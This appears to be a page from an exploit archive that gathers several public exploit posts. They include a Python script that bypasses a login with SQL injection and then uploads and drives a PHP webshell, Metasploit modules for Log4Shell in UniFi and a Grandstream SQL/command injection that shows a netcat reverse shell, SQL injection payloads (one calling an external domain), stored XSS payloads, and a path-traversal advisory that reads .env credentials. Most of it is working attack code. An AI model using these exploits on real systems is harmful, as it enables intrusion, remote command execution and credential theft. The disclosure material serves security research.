<pre><code>## Title: Online Project Time Management 1.0 Multiple SQL - Injections<br />## Author: nu11secur1ty<br />## Date: 01.20.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html<br /><br />## Description:<br />The pid parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\zvy9qc1hwmbswes0cz4uctw9a0gt4l59wck37uvj.sourcecodester.com\\axz'))+'<br />was submitted in the pid parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take account control of all accounts plus an<br />administrator account on this system.<br />Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: pid (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=reports/date_wise&pid=1'+(select<br />load_file('\\\\zvy9qc1hwmbswes0cz4uctw9a0gt4l59wck37uvj.sourcecodester.com\\axz'))+''<br />AND (SELECT 8887 FROM (SELECT(SLEEP(3)))JQmk) AND 'htCu'='htCu<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Online-Project-Time-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ucyq64)<br /></code></pre>
<pre><code># Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)<br /># Date: 15/11/2021<br /># Exploit Author: djebbaranon<br /># Vendor Homepage: https://github.com/oretnom23<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip<br /># Version: 2.0<br /># Tested on: Kali linux / Windows 10<br /># CVE : CVE-2021-42580<br /><br />#!/usr/bin/python3<br />import os<br />import time<br />import argparse<br />import requests<br />import sys<br />from colorama import init<br />from colorama import Fore<br />from colorama import Back<br />from colorama import Style<br />init(autoreset=True)<br />def banner():<br /> print('''<br /><br /> _____ _ _ _ _ _____ ______ _____ _____ <br />| _ | | (_) | | (_) / __ \ | ___ / __ | ___|<br />| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__ <br />| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __| <br />\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___ <br /> \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/ <br /> __/ | <br /> |___/ <br /> Written by djebbaranon <br /> twitter : @dj3bb4ran0n1<br /> zone-h : http://zone-h.org/archive/notifier=djebbaranon<br />''')<br />banner()<br />def my_args():<br /> parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")<br /> parser.add_argument("-u","--url",type=str,required=True,help="url of target")<br /> parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")<br /> parser.add_argument("-c","--command",type=str,required=True,help="command to execute")<br /> my_arguments = parser.parse_args()<br /> return my_arguments<br />def login_with_sqli_login_bypass(user,passw):<br /> global session<br /> global url<br /> global cookies<br /> url = my_args().url<br /> session = requests.Session()<br /> data = {<br /> "username" : user,<br /> "password" : passw,<br /> }<br /> try:<br /> response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)<br /> print( Fore.GREEN + "[+] Logged in succsusfully")<br /> cookies = response.cookies.get_dict()<br /> print("[+] your cookie : ")<br /> except requests.HTTPError as exception:<br /> print(Fore.RED + "[-] HTTP Error : {}".format(exception))<br /> sys.exit(1)<br />login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")<br />def main(shell_name,renamed_shell):<br /> try:<br /> payload ={<br /> "id" : "",<br /> "faculty_id" : "test",<br /> "firstname" : "test",<br /> "lastname" : "test",<br /> "middlename" : "fsdfsd",<br /> "dob" : "2021-10-29",<br /> "gender": "Male",<br /> "department_id" : "1",<br /> "email" : "zebi@gmail.com",<br /> "contact" : "zebii",<br /> "address" : "zebii", <br /> }<br /> files = {<br /> "img" :<br /> (<br /> shell_name,<br /> "<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",<br /> "application/octet-stream",<br /> )<br /> }<br /> vunlerable_file = "/classes/Master.php?f=save_faculty"<br /> print("[*] Trying to upload webshell ....")<br /> response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)<br /> print("[+] trying to bruteforce the webshell ....")<br /> rangee = my_args().range<br /> for i in range(0,rangee):<br /> try:<br /> with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:<br /> if "nikmok" in response3.text and response3.status_code == 200:<br /> print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")<br /> break<br /> with open("shell.txt",mode="w+") as writer:<br /> writer.write(response3.url)<br /> else:<br /> print( Fore.RED + "[-] shell not found : " + response3.url)<br /> except requests.HTTPError as exception2:<br /> print("[-] HTTP Error : {0} ".format(exception2))<br /> except requests.HTTPError as error:<br /> print("[-] HTTP Error : ".format(error))<br /> command = my_args().command<br /> with requests.get(response3.url.replace("whoami",command)) as response4:<br /> print("[*] Executing {} ....".format(command))<br /> time.sleep(3)<br /> print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)<br />main("hackerman.php","")<br /> <br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::JndiInjection<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(_info = {})<br /> super(<br /> 'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',<br /> 'Description' => %q{<br /> The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell<br /> vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the<br /> /api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java<br /> object. This results in OS command execution in the context of the server application.<br /><br /> This module will start an LDAP server that the target will need to connect to.<br /> },<br /> 'Author' => [<br /> 'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff<br /> 'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff<br /> 'Nicholas Anastasi' # Unifi research<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2021-44228' ],<br /> [ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ],<br /> [ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ],<br /> [ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ]<br /> ],<br /> 'DisclosureDate' => '2021-12-09',<br /> 'License' => MSF_LICENSE,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8443,<br /> 'SSL' => true,<br /> 'WfsDelay' => 30<br /> },<br /> 'DefaultTarget' => 1,<br /> 'Targets' => [<br /> [<br /> 'Windows', {<br /> 'Platform' => 'win'<br /> },<br /> ],<br /> [<br /> 'Unix', {<br /> 'Platform' => 'unix',<br /> 'Arch' => [ARCH_CMD],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> },<br /> ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'SideEffects' => [IOC_IN_LOGS],<br /> 'AKA' => ['Log4Shell', 'LogJam'],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> }<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def wait_until(&block)<br /> datastore['WfsDelay'].times do<br /> break if block.call<br /><br /> sleep(1)<br /> end<br /> end<br /><br /> def check<br /> validate_configuration!<br /> res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))<br /> return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?<br /><br /> server_version = res.get_json_document.dig('meta', 'server_version')<br /> return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/<br /><br /> vprint_status("Detected version: #{server_version}")<br /> server_version = Rex::Version.new(server_version)<br /> if server_version < Rex::Version.new('5.13.29')<br /> return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')<br /> elsif server_version > Rex::Version.new('6.5.53')<br /> return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')<br /> end<br /><br /> vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')<br /><br /> start_service<br /> res = trigger<br /> return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?<br /><br /> wait_until { @search_received }<br /> @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')<br /> ensure<br /> stop_service<br /> end<br /><br /> def build_ldap_search_response_payload<br /> return [] if @search_received<br /><br /> @search_received = true<br /><br /> return [] unless @exploiting<br /><br /> print_good('Delivering the serialized Java object to execute the payload...')<br /> build_ldap_search_response_payload_inline('BeanFactory')<br /> end<br /><br /> def trigger<br /> @search_received = false<br /> # HTTP request initiator<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri, 'api', 'login'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'data' => {<br /> 'username' => rand_text_alphanumeric(8..16), # can not be blank!,<br /> 'password' => rand_text_alphanumeric(8..16), # can not be blank!<br /> 'remember' => jndi_string,<br /> 'strict' => true<br /> }.to_json<br /> )<br /> end<br /><br /> def exploit<br /> validate_configuration!<br /><br /> @exploiting = true<br /> start_service<br /> res = trigger<br /> fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?<br /><br /> msg = res.get_json_document.dig('meta', 'msg')<br /> if res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29<br /> fail_with(Failure::NotVulnerable, 'The target is not vulnerable')<br /> end<br /><br /> unless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones)<br /> fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way')<br /> end<br /><br /> wait_until { @search_received && (!handler_enabled? || session_created?) }<br /> handler<br /> ensure<br /> cleanup<br /> end<br />end<br /></code></pre>
<pre><code>## [Sourcecodester-Online-Reviewer-System-2.4.0 SQL - 4 types of<br />injection vulnerability](https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html)<br /><br />## [Vendor](https://www.sourcecodester.com/users/janobe)<br /><br />## Description:<br />The password parameter appears of the Online Reviewer System 1.0 to be<br />vulnerable to SQL injection attacks - 4 types of injection<br />vulnerability.<br />A single quote was submitted in the password parameter, and a database<br />error message was returned.<br />Two single quotes were then submitted and the error message disappeared.<br /><br />## Payloads:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)<br /> Payload: username=TtzgjjZP' OR NOT<br />2693=2693#&password=r1L!h4v!O1'&btn-login=Log In<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=TtzgjjZP' AND (SELECT 4139 FROM(SELECT<br />COUNT(*),CONCAT(0x71707a7171,(SELECT<br />(ELT(4139=4139,1))),0x71707a7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--<br />GJJK&password=r1L!h4v!O1'&btn-login=Log In<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: username=TtzgjjZP';SELECT<br />SLEEP(5)#&password=r1L!h4v!O1'&btn-login=Log In<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=TtzgjjZP' AND (SELECT 8716 FROM<br />(SELECT(SLEEP(5)))MJXH)-- xWIO&password=r1L!h4v!O1'&btn-login=Log In<br />---<br />```<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and<br /> a command injection vulnerability (technically, no assigned CVE but was inadvertently<br /> patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX<br /> series of devices. The vulnerabilities allow an unauthenticated remote attacker to<br /> execute commands as root.<br /><br /> Exploitation happens in two stages:<br /><br /> 1. An SQL injection during username lookup while executing the "Forgot Password" function.<br /> 2. A command injection that occurs after the user provided username is passed to a Python script<br /> via the shell. Like so:<br /><br /> /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \<br /> password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `<br /><br /> This module affect UCM62xx versions before firmware version 1.0.19.20.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2020-5722' ],<br /> [ 'EDB', '48247']<br /> ],<br /> 'DisclosureDate' => '2020-03-23',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_ARMLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'Payload' => {<br /> 'DisableNops' => true,<br /> 'BadChars' => '\'&|'<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'wget' ]<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8089,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> ##<br /> # Sends a POST /cgi request with a payload of action=getInfo. The<br /> # server should respond with a large json blob like the following,<br /> # where "prog_version" is he firmware version:<br /> #<br /> # {"response"=>{<br /> # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance",<br /> # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/",<br /> # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.",<br /> # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1",<br /> # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US",<br /> # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0",<br /> # "support_webrtc_cloud"=>"0"}, "status"=>0}<br /> ###<br /> def check<br /> normalized_uri = normalize_uri(target_uri.path, '/cgi')<br /> vprint_status("Requesting version information from #{normalized_uri}")<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalized_uri,<br /> 'vars_post' => { 'action' => 'getInfo' }<br /> })<br /><br /> return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200<br /><br /> body_json = res.get_json_document<br /> return CheckCode::Unknown('No JSON in response') unless body_json<br /><br /> prog_version = body_json.dig('response', 'prog_version')<br /> return false if prog_version.nil?<br /><br /> vprint_status("The reported version is: #{prog_version}")<br /><br /> version = Rex::Version.new(prog_version)<br /> if version < Rex::Version.new('1.0.19.20')<br /> return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")<br /> end<br /><br /> return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")<br /> end<br /><br /> ##<br /> # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection<br /> # and then it will get passed to a python script via sh which allows us to execute a command injection.<br /> # It will look something like this:<br /> #<br /> # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \<br /> # password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `<br /> #<br /> # This functionality is related to the"Forgot Password" feature. This function is rate limited by<br /> # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few<br /> # payloads are appropriate.<br /> ###<br /> def execute_command(cmd, _opts = {})<br /> rand_num = Rex::Text.rand_text_numeric(1..5)<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi'),<br /> 'vars_post' =><br /> {<br /> 'action' => 'sendPasswordEmail',<br /> 'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`"<br /> }<br /> }, 5)<br /><br /> # the netcat reverse shell payload holds the connection open. So we'll treat no response<br /> # as a success. The meterpreter payload does not hold the connection open so this clause digs<br /> # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload<br /> # generates an error (e.g. rate limit error)<br /> if res<br /> fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200<br /><br /> body_json = res.get_json_document<br /> fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json<br /><br /> status_json = body_json['status']<br /> fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json<br /> fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0<br /> end<br /><br /> print_good('Exploit successfully executed.')<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)<br /># Date: 15/11/2021<br /># Exploit Author: Hosein Vita<br /># Vendor Homepage: https://www.cmdbuild.org<br /># Software Link: https://www.cmdbuild.org/en/download/latest-version<br /># Version: CMDBuild 3.3.2<br /># Tested on: Linux<br /><br />Summary:<br /><br />Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections<br /><br />Proof of concepts : <br /><br />Stored Xss Example: <br /><br />1-Login to you'r Dashboard As a low privilege user<br />2-Click On Basic archives and Employee<br />3- +Add card Employee<br />4- Enter your xss payload in parameters<br />5-On added employee click on "Open Relation Graph"<br /><br />POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1<br />...<br />Cmdbuild-Actionid: class.card.new.open<br />Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353<br /><br />Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 302<br />Connection: close<br /><br />{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}<br /><br /><br />------------------------------------------------------------------------<br /><br /><br />File upload Xss example:<br /><br />1-Click on Basic archives<br />2-Click on Workplace - + Add card Workplace<br />3-Select "attachments" icon - +Add attachment + image<br />4-Upload your svg file with xss payload<br />5-Click on preview and Right click open in new tab<br /><br /><br /><br />Request: <br />POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1<br />Cmdbuild-Actionid: class.card.attachments.open<br /><br />-----------------------------269319782833689825543405205260<br />Content-Disposition: form-data; name="file"; filename="kiwi.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" encoding="utf-8"?><br /><!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) --><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"<br /> width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"<br /> xml:space="preserve"><br /><ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/><br /><path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03<br /> c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341<br /> c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933<br /> c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991<br /> c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875<br /> c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489<br /> c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309<br /> c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876<br /> c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413<br /> c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566<br /> c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156<br /> c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351<br /> c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247<br /> c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331<br /> z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111<br /> C434.693,207.929,439.613,203.01,445.731,203.01z"/><br /> <script>alert(1)</script><br /></svg><br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220124-0 ><br />=======================================================================<br /> title: Authenticated Path Traversal<br /> product: Ethercreative Logs plugin for Craft CMS<br /> vulnerable version: <=3.0.3<br /> fixed version: >=3.0.4<br /> CVE number: CVE-2022-23409<br /> impact: Medium<br /> homepage: https://github.com/ethercreative/logs<br /> found: 2021-07-06<br /> by: Steffen Rogge (Office Berlin)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"A quick and dirty way to access your logs from inside the CP"<br />As found on the plugin store page: https://plugins.craftcms.com/logs<br /><br />Active Installs 4,093 (as of 2021-07-07)<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version v3.0.4 which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Authenticated Path Traversal (CVE-2022-23409)<br />The plugin "Logs" provides a functionality to read log files of the Craft CMS system inside<br />the backend of the CMS. As the requested logfile is not properly validated, an attacker is<br />able to request arbitrary files from the underlying file system with the permissions of the<br />web service user.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Authenticated Path Traversal (CVE-2022-23409)<br />As the plugin is installed as an administrator of the system and the function is only accessible<br />after being logged in as an admin, an attacker needs to be authenticated as an administrator in<br />the backend in order to extract the needed "{MD5}_identity" cookie for the crafted request.<br /><br />The vulnerable endpoint is provided by the plugin under the following path:<br />https://vulnerablesite.com/index.php/admin/actions/logs/logs/stream<br /><br />The vulnerable controller for that endpoint can be found here:<br />https://github.com/ethercreative/logs/blob/master/src/Controller.php<br /><br />The function "actionStream()" provides an endpoint for the Craft CMS and does not validate input<br />values before file content is being read by the function "file_get_contents".<br /><br />public function actionStream ()<br />{<br /> $logsDir = \Craft::getAlias('@storage/logs');<br /> $logFile = \Craft::$app->request->getParam('log');<br /> $currentLog = \Craft::$app->request->get('log', $logFile);<br /> $log = file_get_contents($logsDir . '/' . $currentLog);<br /><br /> exit($log);<br />}<br /><br />A crafted GET parameter with the name "log" can be used to access files on the underlying filesystem<br />with rights as the user executing the web server. In most cases this will be the user "www-data".<br /><br />In order to read the file ".env" or ".env.php" which contains the environment configuration and as<br />such also the database credentials, the following request can be used:<br /><br />GET /admin/actions/logs/logs/stream?log=../../.env HTTP/1.1<br />Host: <host><br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0<br />Connection: close<br />Cookie: 1031b8c41dfff97a311a7ac99863bdc5_identity=<identity_cookie>;<br /><br />The response then discloses the file content of the file ".env":<br /><br />HTTP/1.1 200 OK<br />Date: Thu, 07 Jul 2021 10:08:52 GMT<br />Server: nginx<br />Content-Type: text/html; charset=UTF-8<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Set-Cookie: CraftSessionId=2uisculfj8t9q1tnbiukl6ogjf; path=/; secure; HttpOnly<br />Content-Length: 1600<br />Connection: close<br /><br />[...]<br />$craftEnvVars = [<br /> 'DB_DRIVER' => 'mysql',<br /> 'DB_SERVER' => '********',<br /> 'DB_USER' => '********',<br /> 'DB_PASSWORD' => '********',<br /> 'DB_DATABASE' => '********',<br /> 'DB_SCHEMA' => 'public',<br /> 'DB_TABLE_PREFIX' => '',<br /> 'DB_PORT' => '********',<br /> 'SECURITY_KEY' => '********',<br />[...]<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available at the time<br />of the test:<br /><br />* Version 3.0.3 released on November 25, 2019<br /> Distributed through the Craft Plugin Store https://plugins.craftcms.com/logs<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-07: Contacting vendor through dev@ethercreative.co.uk<br />2021-07-08: Response from vendor, no encryption available but vendor accepted to be responsible<br /> for any risks involved with plaintext communication<br />2021-07-08: Advisory was sent to vendor unencrypted<br />2021-07-09: Vendor released a patch for this vulnerability with version 3.0.4<br /> (https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4)<br />2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation<br /> (CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)<br />2022-01-24: Release of security advisory<br /><br /><br />Solution:<br />---------<br />The vendor released a patched version 3.0.4 or higher which can be retrieved from their<br />website/github:<br />https://plugins.craftcms.com/logs<br />https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4<br /><br /><br />Workaround:<br />-----------<br />Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br 